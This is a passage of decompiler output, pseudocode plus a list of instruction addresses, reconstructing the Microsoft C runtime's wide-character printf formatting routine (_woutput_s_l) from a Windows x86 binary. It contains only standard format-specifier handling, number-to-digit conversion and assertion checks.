                            																						}
                            																					}
                            																				} else {
                            																					__eax = __ebp + 0x14;
                            																					 *(__ebp - 0x4a0) = E0041C2B0(__ebp + 0x14);
                            																					 *(__ebp - 0x49c) = __edx;
                            																				}
                            																			} else {
                            																				__ecx = __ebp + 0x14;
                            																				 *(__ebp - 0x4a0) = E0041C2B0(__ebp + 0x14);
                            																				 *(__ebp - 0x49c) = __edx;
                            																			}
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
                            																			__eflags =  *(__ebp - 0x10) & 0x00000040;
                            																			if(( *(__ebp - 0x10) & 0x00000040) == 0) {
                            																				goto L167;
                            																			}
                            																			goto L163;
                            																		}
                            																	case 0xa:
                            																		L143:
                            																		 *(__ebp - 0x30) = 8;
                            																		goto L144;
                            																	case 0xb:
                            																		L84:
                            																		__eflags =  *(__ebp - 0x30) - 0xffffffff;
                            																		if( *(__ebp - 0x30) != 0xffffffff) {
                            																			__edx =  *(__ebp - 0x30);
                            																			 *(__ebp - 0x4f0) =  *(__ebp - 0x30);
                            																		} else {
                            																			 *(__ebp - 0x4f0) = 0x7fffffff;
                            																		}
                            																		__eax =  *(__ebp - 0x4f0);
                            																		 *(__ebp - 0x47c) =  *(__ebp - 0x4f0);
                            																		__ecx = __ebp + 0x14;
                            																		 *(__ebp - 4) = E0041C290(__ebp + 0x14);
                            																		 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
                            																		__eflags =  *(__ebp - 0x10) & 0x00000020;
                            																		if(( *(__ebp - 0x10) & 0x00000020) == 0) {
                            																			L98:
                            																			__eflags =  *(__ebp - 4);
                            																			if( *(__ebp - 4) == 0) {
                            																				__ecx =  *0x60b4f4; // 0x407414
                            																				 *(__ebp - 4) = __ecx;
                            																			}
                            																			 *(__ebp - 0xc) = 1;
                            																			__edx =  *(__ebp - 4);
                            																			 *(__ebp - 0x480) =  *(__ebp - 4);
                            																			while(1) {
                            																				L101:
                            																				__eax =  *(__ebp - 0x47c);
                            																				__ecx =  *(__ebp - 0x47c);
                            																				__ecx =  *(__ebp - 0x47c) - 1;
                            																				 *(__ebp - 0x47c) = __ecx;
                            																				__eflags =  *(__ebp - 0x47c);
                            																				if( *(__ebp - 0x47c) == 0) {
                            																					break;
                            																				}
                            																				L102:
                            																				__edx =  *(__ebp - 0x480);
                            																				__eax =  *( *(__ebp - 0x480)) & 0x0000ffff;
                            																				__eflags =  *( *(__ebp - 0x480)) & 0x0000ffff;
                            																				if(( *( *(__ebp - 0x480)) & 0x0000ffff) == 0) {
                            																					break;
                            																				}
                            																				L103:
                            																				 *(__ebp - 0x480) =  *(__ebp - 0x480) + 2;
                            																				 *(__ebp - 0x480) =  *(__ebp - 0x480) + 2;
                            																			}
                            																			L104:
                            																			__edx =  *(__ebp - 0x480);
                            																			__edx =  *(__ebp - 0x480) -  *(__ebp - 4);
                            																			__eflags = __edx;
                            																			 *(__ebp - 0x24) = __edx;
                            																			goto L105;
                            																		} else {
                            																			L88:
                            																			__eflags =  *(__ebp - 4);
                            																			if( *(__ebp - 4) == 0) {
                            																				__eax =  *0x60b4f0; // 0x407424
                            																				 *(__ebp - 4) = __eax;
                            																			}
                            																			__ecx =  *(__ebp - 4);
                            																			 *(__ebp - 0x478) = __ecx;
                            																			 *(__ebp - 0x24) = 0;
                            																			while(1) {
                            																				L92:
                            																				__eax =  *(__ebp - 0x24);
                            																				__eflags =  *(__ebp - 0x24) -  *(__ebp - 0x47c);
                            																				if( *(__ebp - 0x24) >=  *(__ebp - 0x47c)) {
                            																					break;
                            																				}
                            																				L93:
                            																				__ecx =  *(__ebp - 0x478);
                            																				__edx =  *__ecx;
                            																				__eflags =  *__ecx;
                            																				if( *__ecx == 0) {
                            																					break;
                            																				}
                            																				L94:
                            																				__ecx = __ebp - 0x40;
                            																				E0040D3B0(__ebp - 0x40) =  *(__ebp - 0x478);
                            																				__ecx =  *( *(__ebp - 0x478)) & 0x000000ff;
                            																				__eax = E00419390( *( *(__ebp - 0x478)) & 0x000000ff,  *(__ebp - 0x478));
                            																				__eflags = __eax;
                            																				if(__eax != 0) {
                            																					__edx =  *(__ebp - 0x478);
                            																					__edx =  *(__ebp - 0x478) + 1;
                            																					__eflags = __edx;
                            																					 *(__ebp - 0x478) = __edx;
                            																				}
                            																				 *(__ebp - 0x478) =  *(__ebp - 0x478) + 1;
                            																				 *(__ebp - 0x478) =  *(__ebp - 0x478) + 1;
                            																				__edx =  *(__ebp - 0x24);
                            																				__edx =  *(__ebp - 0x24) + 1;
                            																				__eflags = __edx;
                            																				 *(__ebp - 0x24) = __edx;
                            																			}
                            																			L97:
                            																			L105:
                            																			while(1) {
                            																				L187:
                            																				__eflags =  *(__ebp - 0x28);
                            																				if( *(__ebp - 0x28) != 0) {
                            																					goto L212;
                            																				}
                            																				goto L188;
                            																			}
                            																		}
                            																	case 0xc:
                            																		L142:
                            																		 *(__ebp - 8) = 0xa;
                            																		while(1) {
                            																			L150:
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00008000;
                            																			__eflags =  *(__ebp - 0x10) & 0x00008000;
                            																			if(( *(__ebp - 0x10) & 0x00008000) == 0) {
                            																				 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00001000;
                            																				__eflags =  *(__ebp - 0x10) & 0x00001000;
                            																				if(( *(__ebp - 0x10) & 0x00001000) == 0) {
                            																					 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000020;
                            																					__eflags =  *(__ebp - 0x10) & 0x00000020;
                            																					if(( *(__ebp - 0x10) & 0x00000020) == 0) {
                            																						 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
                            																						__eflags =  *(__ebp - 0x10) & 0x00000040;
                            																						if(( *(__ebp - 0x10) & 0x00000040) == 0) {
                            																							__ecx = __ebp + 0x14;
                            																							__eax = E0041C290(__ebp + 0x14);
                            																							__edx = 0;
                            																							__eflags = 0;
                            																							 *(__ebp - 0x4a0) = __eax;
                            																							 *(__ebp - 0x49c) = 0;
                            																						} else {
                            																							__eax = __ebp + 0x14;
                            																							__eax = E0041C290(__ebp + 0x14);
                            																							asm("cdq");
                            																							 *(__ebp - 0x4a0) = __eax;
                            																							 *(__ebp - 0x49c) = __edx;
                            																						}
                            																					} else {
                            																						 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
                            																						__eflags =  *(__ebp - 0x10) & 0x00000040;
                            																						if(( *(__ebp - 0x10) & 0x00000040) == 0) {
                            																							__ecx = __ebp + 0x14;
                            																							E0041C290(__ebp + 0x14) = __ax & 0x0000ffff;
                            																							asm("cdq");
                            																							 *(__ebp - 0x4a0) = __ax & 0x0000ffff;
                            																							 *(__ebp - 0x49c) = __edx;
                            																						} else {
                            																							__eax = __ebp + 0x14;
                            																							__eax = E0041C290(__ebp + 0x14);
                            																							__ax = __eax;
                            																							asm("cdq");
                            																							 *(__ebp - 0x4a0) = __eax;
                            																							 *(__ebp - 0x49c) = __edx;
                            																						}
                            																					}
                            																				} else {
                            																					__eax = __ebp + 0x14;
                            																					 *(__ebp - 0x4a0) = E0041C2B0(__ebp + 0x14);
                            																					 *(__ebp - 0x49c) = __edx;
                            																				}
                            																			} else {
                            																				__ecx = __ebp + 0x14;
                            																				 *(__ebp - 0x4a0) = E0041C2B0(__ebp + 0x14);
                            																				 *(__ebp - 0x49c) = __edx;
                            																			}
                            																			 *(__ebp - 0x10) =  *(__ebp - 0x10) & 0x00000040;
                            																			__eflags =  *(__ebp - 0x10) & 0x00000040;
                            																			if(( *(__ebp - 0x10) & 0x00000040) == 0) {
                            																				goto L167;
                            																			}
                            																			goto L163;
                            																		}
                            																	case 0xd:
                            																		goto L0;
                            																	case 0xe:
                            																		while(1) {
                            																			L187:
                            																			__eflags =  *(__ebp - 0x28);
                            																			if( *(__ebp - 0x28) != 0) {
                            																				goto L212;
                            																			}
                            																			goto L188;
                            																		}
                            																}
                            															case 8:
                            																L24:
                            																__ecx =  *(__ebp - 0x10);
                            																__ecx =  *(__ebp - 0x10) | 0x00000002;
                            																 *(__ebp - 0x10) = __ecx;
                            																goto L27;
                            															case 9:
                            																L25:
                            																 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000080;
                            																 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000080;
                            																goto L27;
                            															case 0xa:
                            																L23:
                            																 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000001;
                            																 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000001;
                            																goto L27;
                            															case 0xb:
                            																L22:
                            																 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
                            																 *(__ebp - 0x10) =  *(__ebp - 0x10) | 0x00000004;
                            																goto L27;
                            															case 0xc:
                            																L26:
                            																__eax =  *(__ebp - 0x10);
                            																__eax =  *(__ebp - 0x10) | 0x00000008;
                            																__eflags = __eax;
                            																 *(__ebp - 0x10) = __eax;
                            																goto L27;
                            															case 0xd:
                            																L27:
                            																goto L214;
                            														}
                            													} else {
                            														_t517 = 0;
                            														if(0 == 0) {
                            															 *(_t525 - 0x4dc) = 0;
                            														} else {
                            															 *(_t525 - 0x4dc) = 1;
                            														}
                            														 *(_t525 - 0x46c) =  *(_t525 - 0x4dc);
                            														if( *(_t525 - 0x46c) == 0) {
                            															_push(L"(\"Incorrect format specifier\", 0)");
                            															_push(0);
                            															_push(0x460);
                            															_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
                            															_push(2);
                            															_t498 = L0040E1A0();
                            															_t527 = _t527 + 0x14;
                            															if(_t498 == 1) {
                            																asm("int3");
                            															}
                            														}
                            														L14:
                            														if( *(_t525 - 0x46c) != 0) {
                            															goto L16;
                            														} else {
                            															 *((intOrPtr*)(L0040EC70(_t510))) = 0x16;
                            															E00411A50(_t501, _t510, _t523, _t524, L"(\"Incorrect format specifier\", 0)", L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x460, 0);
                            															 *(_t525 - 0x4c8) = 0xffffffff;
                            															E0040D380(_t525 - 0x40);
                            															_t483 =  *(_t525 - 0x4c8);
                            															L225:
                            															return E00416CA0(_t483, _t501,  *(_t525 - 0x48) ^ _t525, _t517, _t523, _t524);
                            														}
                            													}
                            												}
                            												L215:
                            												__eflags =  *(_t525 - 0x45c);
                            												if( *(_t525 - 0x45c) == 0) {
                            													L218:
                            													 *(_t525 - 0x4f8) = 1;
                            													L219:
                            													_t517 =  *(_t525 - 0x4f8);
                            													 *(_t525 - 0x4bc) =  *(_t525 - 0x4f8);
                            													__eflags =  *(_t525 - 0x4bc);
                            													if( *(_t525 - 0x4bc) == 0) {
                            														_push(L"((state == ST_NORMAL) || (state == ST_TYPE))");
                            														_push(0);
                            														_push(0x8f5);
                            														_push(L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c");
                            														_push(2);
                            														_t488 = L0040E1A0();
                            														_t527 = _t527 + 0x14;
                            														__eflags = _t488 - 1;
                            														if(_t488 == 1) {
                            															asm("int3");
                            														}
                            													}
                            													__eflags =  *(_t525 - 0x4bc);
                            													if( *(_t525 - 0x4bc) != 0) {
                            														 *(_t525 - 0x4d4) =  *(_t525 - 0x44c);
                            														E0040D380(_t525 - 0x40);
                            														_t483 =  *(_t525 - 0x4d4);
                            													} else {
                            														 *((intOrPtr*)(L0040EC70(_t502))) = 0x16;
                            														E00411A50(_t501, _t502, _t523, _t524, L"((state == ST_NORMAL) || (state == ST_TYPE))", L"_woutput_s_l", L"f:\\dd\\vctools\\crt_bld\\self_x86\\crt\\src\\output.c", 0x8f5, 0);
                            														 *(_t525 - 0x4d0) = 0xffffffff;
                            														E0040D380(_t525 - 0x40);
                            														_t483 =  *(_t525 - 0x4d0);
                            													}
                            													goto L225;
                            												}
                            												L216:
                            												__eflags =  *(_t525 - 0x45c) - 7;
                            												if( *(_t525 - 0x45c) == 7) {
                            													goto L218;
                            												}
                            												L217:
                            												 *(_t525 - 0x4f8) = 0;
                            												goto L219;
                            											}
                            										}
                            										L184:
                            										__eflags =  *(__ebp - 0x24);
                            										if( *(__ebp - 0x24) == 0) {
                            											L186:
                            											 *(__ebp - 4) =  *(__ebp - 4) - 1;
                            											 *(__ebp - 4) =  *(__ebp - 4) - 1;
                            											__eax =  *(__ebp - 4);
                            											 *( *(__ebp - 4)) = 0x30;
                            											__ecx =  *(__ebp - 0x24);
                            											__ecx =  *(__ebp - 0x24) + 1;
                            											__eflags = __ecx;
                            											 *(__ebp - 0x24) = __ecx;
                            											goto L187;
                            										}
                            										L185:
                            										__eax =  *(__ebp - 4);
                            										__ecx =  *( *(__ebp - 4));
                            										__eflags = __ecx - 0x30;
                            										if(__ecx == 0x30) {
                            											goto L187;
                            										}
                            										goto L186;
                            									}
                            									L180:
                            									__eax =  *(__ebp - 8);
                            									asm("cdq");
                            									__ecx =  *(__ebp - 0x4a4);
                            									__edx =  *(__ebp - 0x4a8);
                            									__eax = E0041CE40( *(__ebp - 0x4a8),  *(__ebp - 0x4a4),  *(__ebp - 8),  *(__ebp - 0x4a8));
                            									 *(__ebp - 0x494) = __eax;
                            									__eax =  *(__ebp - 8);
                            									asm("cdq");
                            									__eax =  *(__ebp - 0x4a4);
                            									__ecx =  *(__ebp - 0x4a8);
                            									 *(__ebp - 0x4a8) = E0041CDD0( *(__ebp - 0x4a8),  *(__ebp - 0x4a4),  *(__ebp - 8), __edx);
                            									 *(__ebp - 0x4a4) = __edx;
                            									__eflags =  *(__ebp - 0x494) - 0x39;
                            									if( *(__ebp - 0x494) > 0x39) {
                            										__edx =  *(__ebp - 0x494);
                            										__edx =  *(__ebp - 0x494) +  *(__ebp - 0x460);
                            										__eflags = __edx;
                            										 *(__ebp - 0x494) = __edx;
                            									}
                            									__eax =  *(__ebp - 4);
                            									 *( *(__ebp - 4)) =  *(__ebp - 0x494);
                            									 *(__ebp - 4) =  *(__ebp - 4) - 1;
                            									 *(__ebp - 4) =  *(__ebp - 4) - 1;
                            									L178:
                            									__ecx =  *(__ebp - 0x30);
                            									 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                            									 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                            									__eflags =  *(__ebp - 0x30);
                            									if( *(__ebp - 0x30) > 0) {
                            										goto L180;
                            									}
                            									goto L179;
                            								}
                            							}
                            							L165:
                            							__eflags =  *(__ebp - 0x4a0);
                            							if( *(__ebp - 0x4a0) >= 0) {
                            								goto L167;
                            							}
                            							goto L166;
                            							L167:
                            							__ecx =  *(__ebp - 0x4a0);
                            							 *(__ebp - 0x4a8) =  *(__ebp - 0x4a0);
                            							__edx =  *(__ebp - 0x49c);
                            							 *(__ebp - 0x4a4) =  *(__ebp - 0x49c);
                            							goto L168;
                            						}
                            					}
                            				}
                            			}













                            0x004238c9
                            0x004238c9
                            0x004238c9
                            0x004238c9
                            0x004238c9
                            0x004238c9
                            0x004238c9
                            0x004238d3
                            0x004238d3
                            0x004238d3
                            0x004238dd
                            0x004238dd
                            0x004238e3
                            0x004238e5
                            0x004238ea
                            0x004238f4
                            0x004238f4
                            0x004238f7
                            0x004238fb
                            0x004238fb
                            0x00423922
                            0x00423922
                            0x00423925
                            0x00423925
                            0x0042392a
                            0x0042394c
                            0x0042394c
                            0x00423952
                            0x00423974
                            0x00423974
                            0x00423977
                            0x004239be
                            0x004239be
                            0x004239c1
                            0x004239de
                            0x004239e2
                            0x004239ea
                            0x004239ea
                            0x004239ec
                            0x004239f2
                            0x004239c3
                            0x004239c3
                            0x004239c7
                            0x004239cf
                            0x004239d0
                            0x004239d6
                            0x004239d6
                            0x00423979
                            0x0042397c
                            0x0042397c
                            0x0042397f
                            0x0042399d
                            0x004239a9
                            0x004239ac
                            0x004239ad
                            0x004239b3
                            0x00423981
                            0x00423981
                            0x00423985
                            0x0042398d
                            0x0042398e
                            0x0042398f
                            0x00423995
                            0x00423995
                            0x004239b9
                            0x00423954
                            0x00423954
                            0x00423960
                            0x00423966
                            0x00423966
                            0x0042392c
                            0x0042392c
                            0x00423938
                            0x0042393e
                            0x0042393e
                            0x004239fb
                            0x004239fb
                            0x004239fe
                            0x00000000
                            0x00000000
                            0x00423a00
                            0x00423a00
                            0x00423a07
                            0x00000000
                            0x00000000
                            0x00423a09
                            0x00423a09
                            0x00423a14
                            0x00423a1a
                            0x00423a1c
                            0x00423a22
                            0x00423a25
                            0x00423a27
                            0x00423a2d
                            0x00423a36
                            0x00423a3b
                            0x00423a58
                            0x00423a5b
                            0x00423a5b
                            0x00423a60
                            0x00423a65
                            0x00423a65
                            0x00423a6b
                            0x00423a6d
                            0x00423a73
                            0x00423a79
                            0x00423a79
                            0x00423a82
                            0x00423a82
                            0x00423a6b
                            0x00423a88
                            0x00423a8c
                            0x00423a9a
                            0x00423a9d
                            0x00423aa0
                            0x00423aa7
                            0x00423aa9
                            0x00423aa9
                            0x00423a8e
                            0x00423a8e
                            0x00423a8e
                            0x00423ab6
                            0x00423ab6
                            0x00423abc
                            0x00423abe
                            0x00423abe
                            0x00423ac5
                            0x00423acb
                            0x00423ace
                            0x00423ace
                            0x00423ace
                            0x00423ad4
                            0x00423ad7
                            0x00423ada
                            0x00423adc
                            0x00000000
                            0x00000000
                            0x00423ade
                            0x00423ae4
                            0x00423ae4
                            0x00423aea
                            0x00423b67
                            0x00423b6d
                            0x00423b70
                            0x00423b73
                            0x00423b76
                            0x00423b79
                            0x00423b7f
                            0x00423b7f
                            0x00423b85
                            0x00423bb0
                            0x00423bb0
                            0x00423bb0
                            0x00423bb4
                            0x00000000
                            0x00000000
                            0x00423bba
                            0x00423bbd
                            0x00423bbd
                            0x00423bc0
                            0x00423bc5
                            0x00423bc5
                            0x00423bca
                            0x00423be1
                            0x00423be1
                            0x00423be4
                            0x00423bfb
                            0x00423bfb
                            0x00423bfe
                            0x00423c00
                            0x00423c05
                            0x00423c09
                            0x00423c09
                            0x00423be6
                            0x00423be6
                            0x00423beb
                            0x00423bef
                            0x00423bef
                            0x00423bcc
                            0x00423bcc
                            0x00423bd1
                            0x00423bd5
                            0x00423bd5
                            0x00423bca
                            0x00423c13
                            0x00423c16
                            0x00423c19
                            0x00423c22
                            0x00423c22
                            0x00423c25
                            0x00423c27
                            0x00423c2e
                            0x00423c32
                            0x00423c3b
                            0x00423c40
                            0x00423c43
                            0x00423c4a
                            0x00423c4e
                            0x00423c52
                            0x00423c5e
                            0x00423c61
                            0x00423c61
                            0x00423c64
                            0x00423c69
                            0x00423c69
                            0x00423c6c
                            0x00423c6e
                            0x00423c75
                            0x00423c79
                            0x00423c82
                            0x00423c87
                            0x00423c6c
                            0x00423c8a
                            0x00423c8e
                            0x00423d48
                            0x00423d48
                            0x00423d4f
                            0x00423d53
                            0x00423d57
                            0x00423d5b
                            0x00000000
                            0x00423c94
                            0x00423c94
                            0x00423c94
                            0x00423c98
                            0x00000000
                            0x00000000
                            0x00423c9e
                            0x00423c9e
                            0x00423ca1
                            0x00423ca7
                            0x00423caa
                            0x00423cb0
                            0x00423cb0
                            0x00423cb0
                            0x00423cbc
                            0x00423cbf
                            0x00423cc5
                            0x00423cc7
                            0x00000000
                            0x00000000
                            0x00423cc9
                            0x00423cc9
                            0x00423ccc
                            0x00423cd2
                            0x00423cda
                            0x00423cdc
                            0x00423ce3
                            0x00423cea
                            0x00423cf9
                            0x00423cff
                            0x00423d06
                            0x00423d14
                            0x00423d14
                            0x00423d1b
                            0x00423d27
                            0x00423d35
                            0x00423d3b
                            0x00000000
                            0x00423d3b
                            0x00423d08
                            0x00423d08
                            0x00000000
                            0x00423d08
                            0x00423d46
                            0x00423d63
                            0x00423d63
                            0x00423d6a
                            0x00423d6f
                            0x00423d6f
                            0x00423d72
                            0x00423d74
                            0x00423d7b
                            0x00423d88
                            0x00423d8d
                            0x00423d72
                            0x00423d6a
                            0x00423d90
                            0x00423d90
                            0x00423d94
                            0x00423d98
                            0x00423d9c
                            0x00423da4
                            0x00423da4
                            0x00423dab
                            0x00423dab
                            0x00422f2b
                            0x00422f32
                            0x00422f3f
                            0x00422f44
                            0x00000000
                            0x00422f57
                            0x00422f61
                            0x00422f88
                            0x00422f6f
                            0x00422f80
                            0x00422f80
                            0x00422f61
                            0x00422f92
                            0x00422f98
                            0x00422fa4
                            0x00422fa7
                            0x00422fb5
                            0x00422fb8
                            0x00422fc5
                            0x0042306a
                            0x00423070
                            0x00423076
                            0x0042307d
                            0x00000000
                            0x00000000
                            0x00423083
                            0x00423089
                            0x00000000
                            0x00423090
                            0x00423090
                            0x004230aa
                            0x004230af
                            0x00000000
                            0x00000000
                            0x004230b7
                            0x004230b7
                            0x004230be
                            0x004230c1
                            0x004230c4
                            0x004230c7
                            0x004230ca
                            0x004230cd
                            0x004230d0
                            0x004230d7
                            0x004230de
                            0x00000000
                            0x00000000
                            0x004230ea
                            0x004230ea
                            0x004230f1
                            0x004230fd
                            0x00423100
                            0x00423106
                            0x0042310d
                            0x00000000
                            0x00000000
                            0x0042310f
                            0x00423115
                            0x00423115
                            0x0042311c
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00423160
                            0x00423160
                            0x00423167
                            0x0042316a
                            0x00423194
                            0x00423197
                            0x00423197
                            0x004231a1
                            0x004231a1
                            0x004231a5
                            0x0042316c
                            0x0042316c
                            0x00423178
                            0x0042317b
                            0x0042317f
                            0x00423181
                            0x00423184
                            0x00423184
                            0x00423187
                            0x0042318a
                            0x0042318d
                            0x0042318f
                            0x0042318f
                            0x00423192
                            0x004231a8
                            0x00000000
                            0x00000000
                            0x004231ad
                            0x004231ad
                            0x00000000
                            0x00000000
                            0x004231b9
                            0x004231b9
                            0x004231c0
                            0x004231c3
                            0x004231e3
                            0x004231e6
                            0x004231e6
                            0x004231f0
                            0x004231f0
                            0x004231f4
                            0x004231c5
                            0x004231c5
                            0x004231d1
                            0x004231d4
                            0x004231d8
                            0x004231da
                            0x004231da
                            0x004231e1
                            0x00000000
                            0x00000000
                            0x004231fc
                            0x004231fc
                            0x00423203
                            0x0042320f
                            0x00423212
                            0x00423218
                            0x0042321f
                            0x00423332
                            0x00000000
                            0x00423332
                            0x00423225
                            0x0042322b
                            0x0042322b
                            0x00423232
                            0x00000000
                            0x00423269
                            0x00423269
                            0x0042326c
                            0x0042326f
                            0x00423272
                            0x00423299
                            0x00423299
                            0x0042329c
                            0x0042329f
                            0x004232a2
                            0x004232c6
                            0x004232c6
                            0x004232c9
                            0x004232cc
                            0x004232cf
                            0x00423308
                            0x00423319
                            0x00000000
                            0x00423319
                            0x004232d1
                            0x004232d1
                            0x004232d4
                            0x004232d7
                            0x004232da
                            0x00000000
                            0x00000000
                            0x004232dc
                            0x004232dc
                            0x004232df
                            0x004232e2
                            0x004232e5
                            0x00000000
                            0x00000000
                            0x004232e7
                            0x004232e7
                            0x004232ea
                            0x004232ed
                            0x004232f0
                            0x00000000
                            0x00000000
                            0x004232f2
                            0x004232f2
                            0x004232f5
                            0x004232f8
                            0x004232fb
                            0x00000000
                            0x00000000
                            0x004232fd
                            0x004232fd
                            0x00423300
                            0x00423303
                            0x00423306
                            0x0042330a
                            0x00000000
                            0x0042330a
                            0x00000000
                            0x00423306
                            0x004232a4
                            0x004232a4
                            0x004232a7
                            0x004232ab
                            0x004232ae
                            0x00000000
                            0x004232b0
                            0x004232b3
                            0x004232b6
                            0x004232bc
                            0x004232c1
                            0x00000000
                            0x004232c1
                            0x004232ae
                            0x00423274
                            0x00423274
                            0x00423277
                            0x0042327b
                            0x0042327e
                            0x00000000
                            0x00423280
                            0x00423283
                            0x00423286
                            0x0042328c
                            0x00423291
                            0x00000000
                            0x00423291
                            0x00000000
                            0x0042331b
                            0x0042331b
                            0x0042331e
                            0x00423321
                            0x00000000
                            0x00000000
                            0x00423239
                            0x00423239
                            0x0042323c
                            0x0042323f
                            0x00423242
                            0x0042325b
                            0x0042325e
                            0x0042325e
                            0x00423261
                            0x00423244
                            0x00423244
                            0x00423247
                            0x0042324a
                            0x00423250
                            0x00423256
                            0x00423256
                            0x00000000
                            0x00000000
                            0x00423326
                            0x00423326
                            0x00423329
                            0x00423329
                            0x0042332f
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00423337
                            0x00423337
                            0x0042333e
                            0x00423344
                            0x0042334a
                            0x0042334d
                            0x00423353
                            0x0042335a
                            0x00423bb0
                            0x00423bb0
                            0x00423bb0
                            0x00423bb4
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00423bb4
                            0x00423bb0
                            0x00423360
                            0x00423366
                            0x00423366
                            0x0042336d
                            0x00000000
                            0x004236f1
                            0x004236f1
                            0x004236ff
                            0x004236ff
                            0x00423702
                            0x00000000
                            0x00000000
                            0x00423374
                            0x00423377
                            0x00423377
                            0x0042337d
                            0x0042337f
                            0x00423382
                            0x00423382
                            0x00423385
                            0x00423385
                            0x00000000
                            0x00000000
                            0x004234ba
                            0x004234bd
                            0x004234bd
                            0x004234c2
                            0x004234c4
                            0x004234c7
                            0x004234c7
                            0x004234ca
                            0x004234ca
                            0x00000000
                            0x00000000
                            0x004238bd
                            0x004238bd
                            0x004238d3
                            0x004238d3
                            0x004238dd
                            0x004238dd
                            0x004238e3
                            0x004238e5
                            0x004238ea
                            0x004238f4
                            0x004238f4
                            0x004238f7
                            0x004238fb
                            0x004238fb
                            0x00000000
                            0x00000000
                            0x00423424
                            0x00423424
                            0x00423430
                            0x00423436
                            0x0042343d
                            0x0042344b
                            0x0042344b
                            0x00423451
                            0x00423454
                            0x00423460
                            0x004234b5
                            0x00000000
                            0x004234b5
                            0x0042343f
                            0x0042343f
                            0x00423445
                            0x00423449
                            0x00423468
                            0x00423468
                            0x0042346e
                            0x00423496
                            0x0042349d
                            0x004234a3
                            0x004234a6
                            0x004234a9
                            0x004234af
                            0x004234b2
                            0x00423470
                            0x00423470
                            0x00423476
                            0x00423479
                            0x0042347c
                            0x00423482
                            0x00423485
                            0x00423488
                            0x0042348a
                            0x0042348d
                            0x0042348d
                            0x00000000
                            0x0042346e
                            0x00000000
                            0x00000000
                            0x00423709
                            0x0042370c
                            0x0042370f
                            0x00423712
                            0x00423718
                            0x0042371b
                            0x00423722
                            0x00423726
                            0x00423731
                            0x00423731
                            0x00423735
                            0x0042374c
                            0x0042374c
                            0x00423753
                            0x00423755
                            0x00423755
                            0x0042375c
                            0x0042375c
                            0x00423763
                            0x00423771
                            0x00423774
                            0x00423783
                            0x00423786
                            0x0042378a
                            0x0042379f
                            0x0042378c
                            0x0042378c
                            0x0042378f
                            0x00423795
                            0x0042379a
                            0x0042379a
                            0x0042378a
                            0x004237a9
                            0x004237ac
                            0x004237af
                            0x004237b2
                            0x004237b5
                            0x004237b8
                            0x004237be
                            0x004237c4
                            0x004237cc
                            0x004237cd
                            0x004237d0
                            0x004237d1
                            0x004237d4
                            0x004237d5
                            0x004237dc
                            0x004237dd
                            0x004237e0
                            0x004237e1
                            0x004237e4
                            0x004237e5
                            0x004237eb
                            0x004237ec
                            0x004237fb
                            0x004237fd
                            0x00423803
                            0x00423803
                            0x00423808
                            0x0042380a
                            0x0042380e
                            0x00423810
                            0x00423818
                            0x00423819
                            0x0042381c
                            0x0042381d
                            0x0042382c
                            0x0042382e
                            0x0042382e
                            0x0042380e
                            0x00423831
                            0x00423838
                            0x0042383b
                            0x00423840
                            0x00423840
                            0x00423846
                            0x00423848
                            0x00423850
                            0x00423851
                            0x00423854
                            0x00423855
                            0x00423863
                            0x00423865
                            0x00423865
                            0x00423846
                            0x00423868
                            0x0042386b
                            0x0042386e
                            0x00423871
                            0x00423876
                            0x0042387b
                            0x0042387e
                            0x00423881
                            0x00423881
                            0x00423884
                            0x00423884
                            0x00423887
                            0x00423893
                            0x00423bb0
                            0x00423bb0
                            0x00423bb0
                            0x00423bb4
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00423bb4
                            0x00000000
                            0x00423bb0
                            0x00423737
                            0x00423737
                            0x0042373e
                            0x00423741
                            0x00000000
                            0x00000000
                            0x00423743
                            0x00423743
                            0x00000000
                            0x00423743
                            0x00423728
                            0x00423728
                            0x00000000
                            0x00000000
                            0x00423388
                            0x00423388
                            0x00423393
                            0x0042339b
                            0x004233a2
                            0x004233a5
                            0x004233a5
                            0x004233a8
                            0x00423401
                            0x00423408
                            0x004233aa
                            0x004233b1
                            0x004233b7
                            0x004233bd
                            0x004233c4
                            0x004233c7
                            0x004233cd
                            0x004233d5
                            0x004233d7
                            0x004233de
                            0x004233e5
                            0x004233ec
                            0x004233f4
                            0x004233f6
                            0x004233f8
                            0x004233f8
                            0x004233ff
                            0x0042340f
                            0x00423415
                            0x00423418
                            0x00423bb0
                            0x00423bb0
                            0x00423bb0
                            0x00423bb4
                            0x00000000
                            0x00000000
                            0x00000000
                            0x00423bb4
                            0x00000000
                            0x0042389b
                            0x0042389e
                            0x004238a1
                            0x004238a4
                            0x00423922
                            0x00423925
                            0x00423925
                            0x0042392a
                            0x0042394c
                            0x0042394c
                            0x00423952
                            0x00423974
                            0x00423974
                            0x00423977
                            0x004239be
                            0x004239be
                            0x004239c1
                            0x004239de
                            0x004239e2
                            0x004239ea
                            0x004239ea
                            0x004239ec
                            0x004239f2
                            0x004239c3
                            0x004239c3
                            0x004239c7
                            0x004239cf
                            0x004239d0
                            0x004239d6
                            0x004239d6
                            0x00423979
                            0x0042397c
                            0x0042397c
                            0x0042397f
                            0x0042399d
                            0x004239a9
                            0x004239ac
                            0x004239ad
                            0x004239b3
                            0x00423981
                            0x00423981
